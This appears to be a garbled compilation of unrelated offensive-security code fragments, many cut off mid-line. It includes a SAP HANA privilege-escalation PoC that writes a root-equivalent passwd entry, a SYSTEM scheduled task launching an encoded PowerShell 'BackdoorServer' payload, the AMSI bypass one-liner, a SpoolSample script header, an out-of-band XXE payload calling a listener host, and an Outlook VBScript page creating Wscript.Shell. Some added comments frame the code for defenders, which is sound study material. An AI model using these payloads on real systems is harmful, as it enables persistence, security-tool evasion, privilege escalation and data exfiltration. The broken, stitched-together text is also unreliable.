import sys, hexdump, binascii | |
from Crypto.Cipher import AES | |
class AESCipher:
    """Thin AES-CBC decryption helper around PyCryptodome's ``AES`` cipher.

    Only decryption is provided.  The result is the raw decrypted block
    stream: no padding (e.g. PKCS#7) is stripped and, because CBC carries no
    integrity check, the ciphertext is not authenticated.  If the data can
    come from an untrusted party, the caller must verify a MAC (or use an
    AEAD mode) before acting on the plaintext.
    """

    def __init__(self, key):
        """Remember *key*; it is handed unchanged to ``AES.new`` on every decrypt."""
        self.key = key

    def decrypt(self, iv, data):
        """Decrypt *data* with AES-CBC under ``self.key`` and *iv*.

        A fresh cipher object is built on each call — CBC keeps chaining
        state, so reusing one across messages would corrupt output — and is
        also kept on ``self.cipher`` as before.  Length checks for *iv* and
        *data* are left to the library.
        """
        cbc = AES.new(self.key, AES.MODE_CBC, iv)
        self.cipher = cbc
        return cbc.decrypt(data)
import os | |
import signal | |
import sys | |
# Upper bound on attempts (presumably iterations of the retry/race loop that
# follows — TODO confirm against the loop body).
ATTEMPTS = 100000

# Target binary and the IPC socket it serves, hard-coded for the HANA Express
# layout (SID "HXE", instance "90"); adjust both for any other installation.
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"

# NOTE(review): a uid 0 / gid 0 passwd line, i.e. a root-equivalent account.
# Writing it to /etc/passwd is the privilege-escalation primitive of this PoC;
# only run this against systems you are authorized to test.
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
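# Find DC list from Active Directory
$DCs = Get-ADDomainController -Filter *
# Define time for report (default is 1 day)
$startDate = (Get-Date).AddDays(-1)
# Collect successful logon events (4624) from every DC's Security log since $startDate.
# The array has to be accumulated with += : the original assigned with = inside the
# loop, so each DC overwrote the previous one's results and only the last DC survived.
# NOTE(review): 4624 on a DC records sessions created on that DC itself (interactive,
# service and network logons to it), not every logon in the domain; for domain-wide
# authentication visibility also look at Kerberos 4768/4769 and NTLM 4776.  Get-EventLog
# pulls the whole log over the wire and filters client-side; on busy DCs prefer
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624; StartTime=$startDate}
# (note its records expose TimeCreated/Properties rather than TimeGenerated/ReplacementStrings).
$slogonevents = @()
foreach ($DC in $DCs) {
    $slogonevents += Get-EventLog -LogName Security -ComputerName $DC.HostName -After $startDate |
        Where-Object { $_.EventID -eq 4624 }
}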
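# Look-back window in days.
$Days = 1
$events = @()
# 4800/4801 = workstation locked/unlocked (only logged when the "Audit Other
# Logon/Logoff Events" subcategory is enabled).  Get-WinEvent reports an empty
# result as an error ("No events were found that match the specified selection
# criteria"), which would abort a script running under Stop/terminating error
# handling; -ErrorAction SilentlyContinue makes "no events" simply add nothing.
$events += Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = @(4800, 4801)
    StartTime = (Get-Date).AddDays(-$Days)
} -ErrorAction SilentlyContinue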
$events += Get-WinEvent -FilterHashtable @{ | |
LogName='System' | |
Id=@(7000,7001) |
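# Every computer object in the domain.  NOTE(review): this includes disabled and
# stale accounts whose remote queries will time out; consider
# -Filter 'Enabled -eq $true' or a LastLogonDate cut-off for large domains.
$computers = Get-ADComputer -Filter *
$startDate = (Get-Date).AddDays(-1)
Write-Host "Please enter the username to search for logon events:"
$username = Read-Host
# An empty name would, depending on how it is matched below, either select every
# event or none; fail early rather than produce a silently misleading report.
if ([string]::IsNullOrWhiteSpace($username)) {
    throw "A username is required."
}
# Build the list of DNS host names to query.  The original loop appended
# $computers.DNSHostName (the whole collection) on every iteration, yielding an
# N-times-duplicated list and N^2 remote queries; use the loop variable instead.
$Computernames = @()
foreach ($computer in $computers) {
    $Computernames += $computer.DNSHostName
}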
foreach ($System in $Computernames){ |
# Suppress "Are you sure?" prompts so the task registration below runs unattended.
# NOTE(review): the function that follows builds a scheduled task running as SYSTEM
# (-LogonType ServiceAccount) with an -enc (base64, UTF-16LE) PowerShell payload;
# the visible prefix of that blob decodes to a C# source string declaring a
# "BackdoorServer" TcpListener class.  This is persistence tooling — use only in
# authorized engagements, and for detection watch for task creation (4698) whose
# action is "powershell -enc".
$confirmpreference = "none"
function Get-ScheduledTaskSystem | |
{ | |
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) | |
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount | |
$action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG |
#!/usr/bin/env python | |
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket | |
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
# some code from https://www.exploit-db.com/exploits/2879/ | |
import os | |
import sys | |
import argparse | |
import binascii | |
import ConfigParser |
# Well-known AMSI bypass: uses reflection to set the private static field
# AmsiUtils.amsiInitFailed to $true, so the PowerShell host behaves as if AMSI
# initialisation had failed and skips submitting further script content for scanning.
# NOTE(review): this exact string has long been signatured by Defender/AMSI and is
# normally blocked as-is.  Defenders can hunt for it in ScriptBlock logging
# (Event ID 4104) by matching on "AmsiUtils" / "amsiInitFailed".
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
-------------------------------------------------------------- | |
Vanilla payload, used to verify out-of-band (outbound) XXE or blind XXE: a hit on the listener confirms the parser resolves external entities even when nothing is reflected in the response.
-------------------------------------------------------------- | |
<?xml version="1.0" ?>
<!-- Out-of-band XXE probe: when the parser expands &sp; it fetches the URL
     below.  Replace x.x.x.x with a listener you control; a request arriving
     there proves external entity resolution even if the response body is not
     reflected (blind XXE).  Port 443 is presumably chosen to pass egress
     filtering — any port the target can reach works. -->
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
<html> | |
<head> | |
<meta http-equiv="Content-Language" content="en-us"> | |
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> | |
<title>Outlook</title> | |
<script id=clientEventHandlersVBS language=vbscript> | |
<!-- | |
Sub window_onload() | |
Set Application = ViewCtl1.OutlookApplication | |
Set cmd = Application.CreateObject("Wscript.Shell") |